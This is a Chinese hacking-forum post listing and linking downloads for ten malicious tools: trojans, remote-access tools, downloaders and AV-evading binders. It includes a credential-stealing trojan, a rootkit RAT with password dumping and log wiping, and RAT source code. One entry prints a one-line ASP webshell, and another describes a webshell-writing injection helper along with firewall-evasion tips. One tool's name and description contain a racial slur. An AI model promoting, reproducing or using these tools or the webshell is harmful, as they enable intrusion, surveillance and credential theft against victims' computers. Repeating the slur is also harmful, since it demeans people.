[06.16]黑客精品软件更新[软件兵器库整理]
[color=#FF0000][size=3]友情提示:[/size][/color]1. 此更新合集由软件兵器库整理,[color=#0000FF]图片上传到免费空间,可能观看速度有些慢,请耐心等待下[/color]!
2. 所有软件均来自网络,我们保证您下载的软件无任何捆绑,至于有无后门请自行检测!
3. 软件上传于免费网盘, 点击进入下载地址后等待10秒中 即可出现下载地址进行下载!
4. 对于使用工具造成的一切违法行为一律与本站无关!
5. 欢迎访问软件兵器库 专注收集更新国内外最新黑软! 地址: [url=http://hacktools.uu1001.com]http://hacktools.uu1001.com[/url]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
[quote]
[color=#66CC00][size=2]今日更新列表:[/size][/color]
[color=#FF0000]1. [入侵辅助] Backup log to a webshell tool
2. [木马后门] SIS-Downloader v1.1
3. [木马后门] ProAgent v2.1 汉化版
4. [远程控制] 幻影 Phantom V5.1.3.3 CracKed By Hmily DarkCrack[D.S.T]
5. [程序源代码] 守侯远控VC源代码
6. [免杀软件] SOLiD Binder
7. [免杀软件] Phantom Binder 1.0
8. [远程控制] Trendy Nigger Trojan
9. [远程控制] Satellite-RAT V1.0b3汉化版
10. [木马后门] vbdownloader[/color]
[/quote]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
[quote]
1. [color=#FF0000]Backup log to a webshell tool[/color]
软件大小: 18 kb
软件说明:
作者:zhouzhen[E.S.T]
随手的作品,不是什么新技术了。做为注入辅助工具之用。
没有写自动暴库,暴路径 和 自动猜测的代码。 以后可能会更新,主要是练习下编程。vc6 + sdk
关于工具的使用,注入地址要http://开头,值得注意的是物理路径是网站的物理路径,比如 E:\web 后面不要加 \,如果成功的话会备份成E:\web\zz.asp 写入的一句话木马
<%Execute(request("a"))%>
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_7_1_bd9f34ac7b0c8a3.jpg[/img]
[url=http://dd.uu1001.com/download.php?predomain=hacktools&host=hacktools.uu1001.com&pid=tpc&tid=470&aid=789&down_hash=dmRcendnM2FtUmBRNkQuNnYSZXJieHxnI1JbdnEBInQxIGEnYWZufGBRAnJuXwIN][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
2. [color=#FF0000]SIS-Downloader v1.1[/color]
软件大小: 884.51 KB
软件说明:
自动下载并执行就是下载者的特点了,这款也一样,
其他功能就是可以注入默认浏览器,
注入模块功能,功能多还稳定,不如试一下这个。
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_10_1_2cc9a8934f18886.jpg[/img]
[url=http://www.live-share.com/files/327716/SIS-Downloader_v1.1.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
3. [color=#FF0000]ProAgent v2.1 汉化版[/color]
软件大小: 1.35 MB
软件说明:
ProAgent v2.1 木马是一款强大的木马
可以记录:
FlashFXP工具等密码,各种邮件密码:例如Outlook Express,Microsoft Outlook众多网上邮件密码,
可以记录ICQ的各种版本密码,国内的QQ密码还没有测试,所有网页需要登陆的密码,
拨号用户的密码也可以记录,最亮的一点是,他可以记录远程桌面的密码,比如(9x-me-2000-XP-2003)
等`等`等`````一个个测试也不知道能记录多少,反正功能强大。
因为ProAgent v2.1的作者就是土耳其人,用他的英文包翻译的,加上我自身E文就不好,所以也不知道
翻译的对不对,不过软件之强大还需要大家慢慢研究,E问好的自己在翻译一下。
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_10_1_73ffbad1eb94066.jpg[/img]
[url=http://www.live-share.com/files/327712/ProAgent.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
4. [color=#FF0000]幻影 Phantom V5.1.3.3 CracKed By Hmily DarkCrack[D.S.T][/color]
软件大小: 1.07 MB
软件说明:
幻影phantom 是一款采用rootkit技术的内核驱动级远程控制工具。
它具有无进程、无服务、无注册表、端口隐藏、文件隐藏等高隐蔽性特点。它采用目前一些先进的技术,如驱动级API挂钩、代码级注入、PE混合感染、SSDT等。
主要用于以下三个方面: 家长监控子女电脑、老板监控员工电脑、网管监控网吧电脑等。
1、特点:
1)服务端 无进程、无服务、无注册表、端口隐藏、文件隐藏。
2)两种连接方式:直连,反弹
3)支持动态域名和IP上线。
4)部分端口复用
可复用绑定地址为INADDR_ANY型的程序,如可复用mysql的3306端口、443端口等。对于采用了独占方式的端口无法绑定,经测试XP系统端口135,445,1025,1028,1045无法绑定,其他端口基本上都可以。
用netstat -an查看:
LocalAddr为127.0.0.1地址对应的端口可以复用。
LocalAddr为0.0.0.0地址对应的端口有复用的可能,如443、1433、3306可复用,但135、1025不可复用。
部分早期版本IIS可复用80端口。
通过把端口重绑定到防火墙开放的端口可实现穿越防火墙的功能。例如:如果是服务器可以反弹53,个人机80/4000等端口过防火墙.
5) 人性化设计,简单易用.
适用平台:windows NT/2000/xp/2003
--------------------------------------------------------------------------
2、功能简介
1)压力测试:syn,udp,icmp,tcp
2)集群管理:批量下载、下载并执行、下载并隐藏执行、显示开网页、隐藏开网页、设主页。
3)进程管理:列举进程、杀进程。
4)文件管理:文件信息获取、发送、接收、删除、运行,创建文件夹、删除文件夹。
5)文件搜索:支持精确搜索和模糊搜索。
6)远程桌面:远程屏幕查看。(对方电脑处于屏保状态是黑屏.)
7) 超级终端:完全仿真CMD环境,执行所有dos命令,如net user admin 123 /add ,tasklist等等. exit退出shell
+高级命令-> findpass 可以获取WINNT/2000的密码,并且可以获取2003的密码(2003SP1,SP2不可以获取).
如果该台计算机以前选择了自动登录,还并可以获取以前登录的默认密码。
8)日志管理:包括删除全部日志,删应用程序日志,删安全日志,删系统日志。
9)上线记录:IP上线记录和提示。
10)标记ID,分组,计算机名,OS,CPU,内存,内网/外网,上线时间,程序版本.
11)显示地理位置:把纯真数据库QQWry.Dat和XEngine.exe放在同一个目录,即可显示IP所在地。
友好性设计:
1)双击触发功能。直接双击某个上线的电脑就出现文件管理的界面。
2)MSN样式上线风格提示.
3)强大的右键菜单.(多点击右键吧.)
4)丰富的快捷键(如ctrl+w界面隐藏快捷键)
5)仿QQ自动伸缩界面,抽屉效果
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_11_1_d9e85ea550ddfba.jpg[/img]
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_11_1_c3534a68a30b8ff.jpg[/img]
[url=http://www.live-share.com/files/327992/___Phantom_V5.1.3.3_CracKed_By_Hmily.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
5. [color=#FF0000]守侯远控VC源代码[/color]
软件大小: 884.3 KB
软件说明:
名称: 守侯---远控客户端 (V1.1.0.188)
本软件仅供学习交流使用。
如用本程序于非法用途所导致的后果自负,与作者无关
简介
本套代码为开源远程控制类型软件测试版本,主要目的学习及交流远控技术.
功能概括
1. 远程屏幕查看及控制,录制远程屏幕到本地AVI文件及保存本地图片.
2. 远程摄象头管理,录制远程摄象头到本地AVI文件及监听远程语音.
3. 远程文件管理
4. 远程进程管理
5. 远程服务管理
6. 远程窗口管理
7. 远程命令行管理
8. 远程键盘记录
9. ***S模块简单模拟
10. 远程3322动态域名上线测试
*************************************************************************************************
2008-6-12
由于最近工作比较忙,没有太多时间继续完善,所以把代码发给大家一起交流,继续更新.
Client 文件夹为客户端代码
Server 文件夹为服务端代码
Common 文件夹为公用类代码
Exe 文件夹为程序生成目录
把纯真IP数据库文件(QQWry.Dat) 和 客户端放在一起 即可显示物理地址
由于数据库文件比较大,网上下载很多,请自行从网上下载
未实现模块
现在的网络传输模块采用的原始SOCKET阻塞模式,效率不是很高.有时间将改成IOCP异步方式
暂时未实现过防火墙及主动防御模块,考虑用恢复SSDT的方式实现,那位有更好的方法可以联系我一起交流
*************************************************************************************************
鸣谢
在写这套测试版软件过程中借鉴了Gh0st和Vipshell两套远控代码,从里面学到很多,特此感谢两位作者的开源
精神.同时感谢网友Franket提供的资料及建议,多谢了哥们 (^-^).
*************************************************************************************************
本套代码只是初期的测试版本,里面不可避免会有BUG.请发现BUG的朋友发送信息给我,提供BUG描述,我会尽快更新代码.
有问题请联系 QQ:837568664
Email: [email=dongchaomissyou@21cn.com]dongchaomissyou@21cn.com[/email]
*************************************************************************************************
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_12_1_cf93012fc5fd24a.jpg[/img]
[url=http://www.live-share.com/files/327996/_______.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
[/quote]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
[quote]
6. [color=#FF0000]SOLiD Binder[/color]
软件大小: 697.46 KB
软件说明:
Features
Extraction Options
Execution Options
Registry Startup
XOR Encryption
RC4 Encryption
Fake Message Box #Can be used without binder
Remote WebDownloader #Can be used without binder
Icon Changer
UPX Support
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_1/hacktools_8_1_c63059298f7253c.jpg[/img]
[url=http://www.live-share.com/files/327999/SOLiD_Binder.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
7. [color=#FF0000]Phantom Binder 1.0[/color]
软件大小: 417.72 KB
软件说明:
stub size : 520ko
98% undetected binded/crypted files
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_2/hacktools_8_1_15ce35e7c02dbe0.jpg[/img]
[img]http://ab.uu1001.com/uu/uu_0806_2/hacktools_8_1_ba95e1d16a60693.jpg[/img]
[url=http://www.live-share.com/files/328000/Phantom_Binder_1.0.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
8. [color=#FF0000]Trendy Nigger Trojan[/color]
软件大小: 93.79 KB
软件说明:
Trendy Nigger Trojan
by b0b (thereisanexithere.com, recognize *****)
The usual disclaimer rules for malware still apply. The user takes responsibility for any damage or legal issues caused by the use of this software. Don't hax nobody and tell them it was my fault, I'll be pissed.
Trendy Nigger Trojan is a simple lite trojan. "Lite" meaning it only has a file manager, process killing and enough fun functions to satisfy me. Same great trojan taste, less calories.
Uses outdated fwb+#^!@-+ injection (that's fwb++ for you uncouth mother ****ers).
Server size is 4,112 bytes unpacked, written in C. Client is written in VB6 boohoo.
Did not test compatability with any exe packers. Packing may, and probably will, break the server. So good luck with that.
Forums for TNT support and other stuff are at [url=http://www.thereisanexithere.com/forums/]http://www.thereisanexithere.com/forums/[/url]
Features:
+File Manager
--Download File/Folder with some voodoo nigger rigged resume transfer crap (I'll explain this below)
--Upload File
--Delete File/Folder
--Create Directory
--Rename File/Folder
--Run File
--Search
+Process Manager just has list/kill processes
+Fun Stuff
--Caps/Num/Scroll lock on&off
--Show/Hide taskbar
--Monitor on/off
--Show/Hide clock
--Show/Hide desktop icons
--Open/Close CD-ROM (LOLOLL!)
--Swap/Restore mouse buttons
--Show/Hide & Enable/Disable Start button
--Print text
--Shutdown/Reboot/Logoff/Force shutdown
--Message box
o some extra info:
-CommandsDLL.dll is needed by the client, don't **** with it.
-Only one port is used by the server, so you can't do anything during file transfers. Why only one port? It's a lite trojan, dick.
-The resume downloads option is stupid. The client still allows you to stop/restart downloads with this feature turned off. Resume downloads only really helps if the client crashes or some other weird random bullshit that doesnt allow the client to save transfers.dat. And the "Existing files" options tell the client what to do when it begins to download a file that already exists in the local path. Oh and you can't resume more than one file with the same name, just don't use resume download. Just don't use it.
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_11_1_be8c606a754d0fb.jpg[/img]
[url=http://www.live-share.com/files/328002/Trendy_Nigger_Trojan.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
9. [color=#FF0000]Satellite-RAT V1.0b3汉化版[/color]
软件大小: 1.08 MB
软件说明:
Programmed by: MarjinZ
Coded In: Client: VB6, Server: C++ (VB-thunder)
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_11_1_61232dfedbc1e56.jpg[/img]
[url=http://www.live-share.com/files/328004/Satellite-RAT_V1.0b3___.rar.html][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
10. [color=#FF0000]vbdownloader[/color]
软件大小: 9 kb
软件说明:
This is a simple webdownloader written in Visual Basic 6 for Windows XP (didn't even test on other versions of Windows, won't work on 9x duh).
Executable is injected into a new instance of svchost.exe (does not use a dll).
Do not pack the server or it will not work. Ya I know, 24kb downloader wtf. sry.
Usage:
Builder.exe URL Filename
File is downloaded from URL and saved as %sysdir%\Filename and executed.
no spaces in parameters pls. ty.
some stuff:
This method of "injection" isn't really efficient since it only works with certain compile options and the executables that can be injected into are limited, but its better than that weak ass dll injection. I just wanted to prove that a vb executable could be (sort of) injected into another process. Suck on that nonbelievers.
VB编写的下载者,在CMD下生成
程序截图:
[img]http://ab.uu1001.com/uu/uu_0806_3/hacktools_10_1_314991e4cbe987d.jpg[/img]
[url=http://dd.uu1001.com/download.php?predomain=hacktools&host=hacktools.uu1001.com&pid=tpc&tid=485&aid=809&down_hash=dmRcendnM2FtUmBRNkQuNnYSZXJieHxnI1JbdnEBInQxIGEnYWZufGBRAnJuXwIN][color=#0000FF][size=4]点击进入下载页面[/size][/color][/url]
[/quote]
[img]http://img1.ylmf.com/attachment/Day_080410/148_250883_9a5a7116518b778.gif[/img]
页:
[1]